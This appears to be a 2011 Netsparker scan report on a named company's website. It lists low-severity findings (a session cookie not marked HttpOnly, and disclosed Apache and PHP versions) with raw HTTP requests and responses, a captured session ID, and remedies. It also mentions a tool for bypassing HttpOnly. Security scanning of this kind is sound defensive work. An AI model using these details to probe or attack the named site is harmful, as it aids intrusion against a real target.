column --> </tr></table> <hr noshade size="1" color="#DDDDDD" width="760" align="center" /><table id="footertable" align="center"> <tr> <td align="left" valign="top" width="50%"> <a href="sitemap.php" class="footer">SITE MAP</a> &nbsp; | &nbsp; <!--<a href="privacy.php" class="footer">PRIVACY POLICY</a> &nbsp; | &nbsp; --> <a href="press_contacts.php" class="footer">CONTACT US</a> &nbsp; | &nbsp;<a href="admin.php" class="footer">ADMIN</a> &nbsp; | &nbsp; <a href="privacy.php" class="footer">PRIVACY</a> </td> <td align="right" valign="top" width="50%"> &copy; 2004-2011 Strategic Vision, Inc.<br /> Site by <!--<a href="http://www.nickbarrett.org" title="Nick Barrett" target="_blank" class="footer">Nick Barrett</a> &amp;--><a href="mailto:pgossling@gmail.com" class="footer">Philip Gossling</a> </td> </tr></table> </div> </td> <td width="5" bgcolor="#CCCCCC" background="images/content_rightshadow.gif">&nbsp;</td> </tr></table> </center> </body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /clients.php

/clients.php CONFIRMED

http://www.strategicvision.com/clients.php

Identified Cookie

PHPSESSID

Request

GET /clients.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Clients</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CLIENTS</div><div class="sidemenu_item"><a href="clients.php">Past Clients</a></div><!--<div class="sidemenu_item"><a href="client_success.php">Success Stories</a></div>--><!--<div class="sidemenu_item"><a href="client_dao_login.php">DAO Login</a></div>--><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Past Clients</div> <div class="pagetext"> <p>Strategic Vision is the premier authority on the Values and Emotions of customers, audiences and constituents worldwide. Dr. Darrel Edwards and the Strategic Vision team have explored the dynamics of Values and Emotions across the broadest variety of products, services, industries, and communications. The system connects attributes, benefits and images to Values and Emotions that shape decisions and behavior. We are celebrating 40 years as the leaders in ValueCentered Psychology&reg;.</p> <ul> <li>Household and retail and the women who buy their products around the world</li> <li>Doctors and patients</li> <li>Educators and students</li> <li>Advertisement, advertisers, and consumers</li> <li>Technology, telecommunications and transportation</li> <li>Entertainers and their audiences</li> <li>Financial institutions and customers</li> <li>Politicians and constituents</li> <li>Automotive manufacturers and dealers and the new car and used car buyers in America</li> </ul> <p>See some of the clients that Strategic Vision has served in the past. </p> <p style="font-size:75%"><i>(Note: Corporate logos appearing on this site are for illustrative purposes only and do not imply endorsement or sponsorship of Strategic Vision. All other trademarks and logos are the property of their respective owners.)</i></p> <p class="pagesubtitle">Advertising</p><table cellpadding="5" cellspacing="0" border="0" class="text"><tr></td><tr><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.bbdo.com" target="_blank"><img src="images/client_logos/bbdo.gif" alt="BBDO Advertising" title="BBDO Advertising" border="0" /></a><br /></p></td><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.burrell.com" target="_blank"><img src="images/client_logos/burrell.gif" alt="Burrell Communications" title="Burrell Communications" border="0" /></a><br /></p></td><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.tbwachiat.com/" target="_blank"><img src="images/client_logos/chiatday.gif" alt="Chiat \ Day" title="Chiat \ Day" border="0" /></a><br /></p></td></td><tr><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.temmc.com/" target="_blank"><img src="images/client_logos/tm.gif" alt="Temerlin McClain Advertising" title="Temerlin McClain Advertising" border="0" /></a><br /></p></td><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.yr.com" target="_blank"><img src="images/client_logos/yr.gif" alt="Young & Rubicam" title="Young & Rubicam" border="0" /></a><br /></p></td><td width="195">&nbsp;</td></tr></table><div style="text-align: right;"><a href="#top">^ back to top</a></div><br /><p class="pagesubtitle">Automotive</p><table cellpadding="5" cellspacing="0" border="0" class="text"><tr></td><tr><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.acura.com/" target="_blank"><img src="images/client_logos/acura.gif" alt="Acura" title="Acura" border="0" /></a><br /></p></td><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.astonmartin.com/" target="_blank"><img src="images/client_logos/astonmartin.gif" alt="Aston-Martin" title="Aston-Martin" border="0" /></a><br /></p></td><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.audiusa.com" target="_blank"><img src="images/client_logos/audi.gif" alt="Audi" title="Audi" border="0" /></a><br /></p></td></td><tr><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.bmwusa.com" target="_blank"><img src="images/client_logos/bmw.gif" alt="BMW" title="BMW" border="0" /></a><br /></p></td><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.cadillac.com/" target="_blank"><img src="images/client_logos/cadillac.gif" alt="Cadillac" title="Cadillac" border="0" /></a><br /></p></td><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.chrysler.com/" target="_blank"><img src="images/client_logos/chrysler.gif" alt="Chrysler Corporation" title="Chrysler Corporation" border="0" /></a><br /></p></td></td><tr><td width="195" valign="middle" align="center"><p class="userinfo"><a href="http://www.daimlerchrysler.com/dccom" target="_blank"><img src="images/client_logos/daimlerchrysler.gif" alt="DaimlerChrysler" title="DaimlerChrysler" border="0" /></a><br /></p></td><td width="195" valign="middle" align="center"><p class="userinfo"><a href=&quo..
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /sitemap.xml

/sitemap.xml

http://www.strategicvision.com/sitemap.xml

Extracted Version

2.2.3

Request

GET /sitemap.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:14 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Dec 2009 21:37:19 GMT
ETag: "23c0c3d-3e5a-31c841c0"
Accept-Ranges: bytes
Content-Length: 15962
Connection: close
Content-Type: text/xml


<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd"><!-- created with Free Online Sitemap Generator www.xml-sitemaps.com --><url> <loc>http://www.strategicvision.com/</loc></url><url> <loc>http://www.strategicvision.com/index.php</loc></url><url> <loc>http://www.strategicvision.com/consumers.php</loc></url><url> <loc>http://www.strategicvision.com/research.php</loc></url><url> <loc>http://www.strategicvision.com/ratings.php</loc></url><url> <loc>http://www.strategicvision.com/method.php</loc></url><url> <loc>http://www.strategicvision.com/company.php</loc></url><url> <loc>http://www.strategicvision.com/clients.php</loc></url><url> <loc>http://www.strategicvision.com/press.php</loc></url><url> <loc>http://www.strategicvision.com/press_blogs.php</loc></url><url> <loc>http://www.strategicvision.com/surveys.php</loc></url><url> <loc>http://www.strategicvision.com/press_release.php?pr=36</loc></url><url> <loc>http://www.strategicvision.com/press_release.php?pr=35</loc></url><url> <loc>http://www.strategicvision.com/press_release.php?pr=32</loc></url><url> <loc>http://www.strategicvision.com/sitemap.php</loc></url><url> <loc>http://www.strategicvision.com/press_contacts.php</loc></url><url> <loc>http://www.strategicvision.com/privacy.php</loc></url><url> <loc>http://www.strategicvision.com/auto_research.php</loc></url><url> <loc>http://www.strategicvision.com/sweepstakes_winners.php</loc></url><url> <loc>http://www.strategicvision.com/auto_tqa.php</loc></url><url> <loc>http://www.strategicvision.com/auto_tvi.php</loc></url><url> <loc>http://www.strategicvision.com/auto_delight.php</loc></url><url> <loc>http://www.strategicvision.com/auto_pim.php</loc></url><url> <loc>http://www.strategicvision.com/auto_ethnic_report_2006.php</loc></url><url> <loc>http://www.strategicvision.com/govt_research.php</loc></url><url> <loc>http://www.strategicvision.com/jury_research.php</loc></url><url> <loc>http://www.strategicvision.com/org_intervention.php</loc></url><url> <loc>http://www.strategicvision.com/via_research.php</loc></url><url> <loc>http://www.strategicvision.com/team.php</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=1</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=8</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=9</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=11</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=12</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=13</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=14</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=30</loc></url><url> <loc>http://www.strategicvision.com/charity.php</loc></url><url> <loc>http://www.strategicvision.com/press_auto.php</loc></url><url> <loc>http://www.strategicvision.com/press_rss.php</loc></url><url> <loc>http://www.strategicvision.com/sweepstakes_rules.php</loc></url><url> <loc>http://www.strategicvision.com/2010_sweepstakes_rules.php</loc></url><url> <loc>http://www.strategicvision.com/auto_tqa_winners.php</loc></url><url> <loc>http://www.strategicvision.com/auto_tva_winners.php</loc></url><url> <loc>http://www.strategicvision.com/pdf/auto_2009_tvi_release.pdf</loc></url><url> <loc>http://www.strategicvision.com/pdf/auto_2009_tqa_release.pdf</loc></url><url> <loc>http://www.strategicvision.com/pdf/auto_2008_sgi_release.pdf</loc></url><url> <loc>http://www.strategicvision.com/pr_mantle_presidency.php</loc></url><url> <loc>http://www.strategicvision.com/pr_justice_for_all.php</loc></url><url> <loc>http://www.strategicvision.com/pr_airline_passenger.php</loc></url><url> <loc>http://www.strategicvision.com/blog.php?blog=14</loc></url><url> <loc>http://www.strategicvision.com/blog_alex_2005show.php?blog=2</loc></url><url> <loc>http://www.strategicvision.com/blog_alex_2004show.php?blog=1</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=2</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=3</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=4</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=24</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=5</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=6</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=22</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=7</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=8</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=9</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=26</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=23</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=20</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=10</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=11</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=12</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=13</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=14</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=15</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=16</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=17</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=18</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TVA&amp;seg=19</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=2</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=3</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=4</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=5</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=6</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=7</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=8</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=9</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=10</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=11</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=12</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=13</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=14</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=15</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=16</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=17</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=18</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=2</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=3</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=4</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=5</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=6</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=7</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=16</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=17</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=19</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=25</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=26</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=28</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=31</loc></url><url> <loc>http://www.strategicvision.com/team.php?person=32</loc></url><url> <loc>http://www.strategicvision.com/auto_tqa_winners.php?year=2009</loc></url><url> <loc>http://www.strategicvision.com/auto_tva_winners.php?year=2009</loc></url><url> <loc>http://www.strategicvision.com/auto_tqe.php</loc></url><url> <loc>http://www.strategicvision.com/pdf/auto_2006_delight_summary.pdf</loc></url><url> <loc>http://www.strategicvision.com/blog_alex_2005show.php</loc></url><url> <loc>http://www.strategicvision.com/blog_alex_2004show.php</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=2</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=3</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=4</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=24</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=5</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=6</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=22</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=7</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=8</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=9</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=26</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=23</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=20</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=10</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=11</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=12</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=13</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=14</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=15</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=16</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=17</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=18</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=TQA&amp;seg=19</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=2</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=3</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=4</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=24</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=5</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=6</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=22</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=7</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=8</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=9</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=26</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=23</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=20</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=10</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=11</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=12</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=13</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=14</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=15</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=16</loc></url><url> <loc>http://www.strategicvision.com/auto_segmentwinners.php?year=2009&amp;award=tva&amp;seg=17</loc></url..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /clients.php

/clients.php

http://www.strategicvision.com/clients.php

Extracted Version

PHP/5.1.6

Request

GET /clients.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:49:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
